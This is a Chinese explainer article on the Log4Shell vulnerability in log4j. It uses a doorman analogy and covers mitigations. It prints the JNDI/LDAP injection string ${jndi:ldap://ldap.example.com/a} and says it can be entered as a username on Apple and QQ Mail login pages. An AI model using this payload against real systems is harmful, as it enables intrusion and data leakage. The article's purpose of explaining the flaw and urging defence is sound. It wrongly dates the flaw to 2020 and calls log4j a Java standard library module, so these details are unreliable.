作者：李晓飞

来源：Python 技术

2020 年的12月，势必成为各个互联网公司年度最深刻的记忆。

在 12 月初，爆出了一个核弹级的系统漏洞，导致众多互联网公司内部服务器被发现，劫持，甚至植入程序。

尽管目前已经出台了修复补丁，但这个出现在最基础的应用最广泛的模块 log4j 上的漏洞还是让我们心有余悸。

为什么这么就没有被发现，为什么这个漏洞如此严重，这个漏洞到底是怎么回事？……

什么样的漏洞

log4j[1] 是 Java 标准库的模块，主要负责记录各种日志，和 Python 中的 logging[2] 类似。

log4j 功能强大，可以支持各种场景的日志记录需求，比如将日志输出到终端，将日志记录到文件，或者发送到日志服务器等等，可以说但凡需要记录日志的地方，log4j 是最佳选择。

正是由于这一点，log4j 才成为最常用的模块，加上互联网公司的基础设施都是由 java 构建的，所以 log4j 深入到每个公司的角角落落。

log4j 就像一个兢兢业业，任劳任怨的门卫老大爷，一丝不苟的记录着各种来访信息，以便系统排查问题。

为什么这样一个普通的，不起眼的模块会爆出一个惊天漏洞呢？

为了说明这个情况，我借鉴 少数派 PlatyHsu 的比喻[3]做讲解，即使你不会编程，不懂技术也可以理解。

门卫

前面我们说 log4j 是一个日志模块，就像一个门卫老大爷，凡是进入里面的人，都需要在门卫处登记一下。

注意这里的登记不是验证，只是简单的记录一下，比如谁，什么时候，什么目的等等，将这些信息记录到日志里。

我们经常看到的 Web 系统的访问日志，就是这个模块负责产生的。

本来一切正常，但是在一些对性能要求很高的系统中，为了不让日志记录占用太多的时间（毕竟，停下来被询问也是需要时间的），日志模块里增加了一个事后处理的功能。

也就是说当访问者很着急时，只要留下一个电话，让门卫之后去询问就好了。

这个设计有诸多好处，类似于异步处理，将记录日志的过程分离出去，异步处理，这样就不会影响主要流程的执行了。

但是，问题也是出在这里的。

诈骗电话

一些别有用心的人，就利用预留电话的机制，留下了诈骗电话。

当日志处理模块，事后整理日志时，发现有一行写了打电话询问，于是就拨打了留下的电话，然后电话那头说，恭喜你中奖了，奖品是一部手机，只要提供地址信息就可以免费邮寄过来，等等

这个日志模块在完全不知情的情况下，就泄露了企业内部的信息，这些信息包括收件人，内部电话等等。

你可能会奇怪，为什么需要日志模块拨打电话呢？到底是怎么拨打的电话，这里稍作展开一下。

日志模块不是真的去拨打电话，而是日志记录的机制中允许使用模板。

就像 Python 里的字符串模板一样，在合成字符串时，可以用占位符代替实际内容，根据实际情况做出填充例如：

strTemp = "Hello {name}" print(strTemp.format(name= 'Lily')) # 结果为：Hello Lily 

log4j 为了灵活，使用一个叫 JNDI[4]（Java Naming and Directory Interface）的目录查询方法，这个方法可以支持 LDAP[5]（轻型目录访问协议，Lightweight Directory Access Protocol）协议，对网络上的轻型目标进行查询。

LDAP 的格式为:

ldap://ldap.example.com/cn=John%20Appleseed

意思是向 ldap.example.com 发送一个请求，查询名为 John Appleseed 这个人的信息。

重点来了：

LDAP 协议是可以进行网络访问的

到这里我们就会发现，当处理日志的程序，执行到需要替换日志模板的语句时，恰巧有时需要通过 LDAP 协议获取信息的情况下，就会去访问这个地址。

如果别有用心者，将这个地址作为一个陷阱，或者作为一个木马程序的下载地址，就可以在服务器毫不知情的情况下，在暴漏服务器内部信息，甚至下载木马程序到服务器上。

之前的很多报道已经指出，黑客利用这个漏洞，在服务器上安装了挖矿程序。

如何实施

对于普通大众来说，系统漏洞离我们很远，即使知道这样的漏洞存在，也不知如何发挥作用，也是因为这个原因，导致很多人对漏洞信息不敏感，以为自己不知道如何使用，别人也就不知道，这样的想法会让自己常常处于危险之中。

log4Shell 漏洞，实施起来简单地让人难以置信，甚至不需要使用什么攻击工具，只需要在平台的登录页面，填写一个特别的用户名即可。

例如在苹果网站上，将用户名写成类似这样的 ${jndi:ldap://ldap.example.com/a} 形式：

苹果

当然 ldap 网站需要自己设置或者使用一个可以提供记录访问者信息的服务，就能看到苹果内部的服务器信息了。

这里还有对 QQ 邮箱的攻击示例：

QQ邮箱

只要在能访问系统的地方，加上特殊的注入语句，就可以实施攻击了，所以对漏洞的攻击，并没有想象中那么复杂，因此在发现漏洞时，要及时打补丁做补救，而不能因为自己不知如何实施而放之不管。

如何消除

当我们了解了整个过程，对于如何防止就很清晰了，如果这个漏洞没有被及时修复，也可以采取一些措施防止信息泄露。

最容易想到的是防止系统对不了解的外网进行访问。

就像给内部电话限制拨打长途一样，对于超出范围的呼叫做出限制。

第二可以通过参数设置禁止系统的中的 JNDI 通信协议，就是让日志模块中的 JNDI 失效。

还有就是下载补丁，修补漏洞。

给我们的启示

漏洞修补很容易，但是造成这个漏洞的根源却难以消除。

我们总是在易用性和安全性之间找到一个平衡点，而增加易用性和功能性的同时，会引入更多的不确定性，特别是当依赖层级加大，大量的间接依赖会使问题的复杂程度超出我们的想象。

log4Shell 因为其巨大的破坏性，一经发现，就被及时处理了，但可能还存在这样那样的依赖导致的问题，继续存在。

因此我们在做系统扩展功能的时候，要特别注意因为依赖而导致的系统问题，很多时候命名觉得无关紧要的边缘的功能，却成了漏洞躲藏的绝佳场所。

总结

没有一个纯净的环境，完美的世界，log4Shell 漏洞让我更清楚地看到这个世界的真实 —— 漏洞无处不在！

我们能做的就是要提供防护意识，像预防新冠病毒一样做好防护，不迷信，不谣传，也不大意和忽视。

可能我们平时写的代码效用有限，如果没有防护和安全意识，就像裸奔一样。

几年前笔者在 github 上发布一段代码示例时，误将实际环境的配置信息上传了上去，过来一周左右，意识到问题时，服务器已经被人注入了挖矿程序！

很难想象一个默默无闻的更新会被人注意且利用了，所以防护意识是我们畅游于网络的护身符。

比心！

很难想象一个默默无闻的更新会被人注意且利用了，所以防护意识是我们畅游于网络的护身符。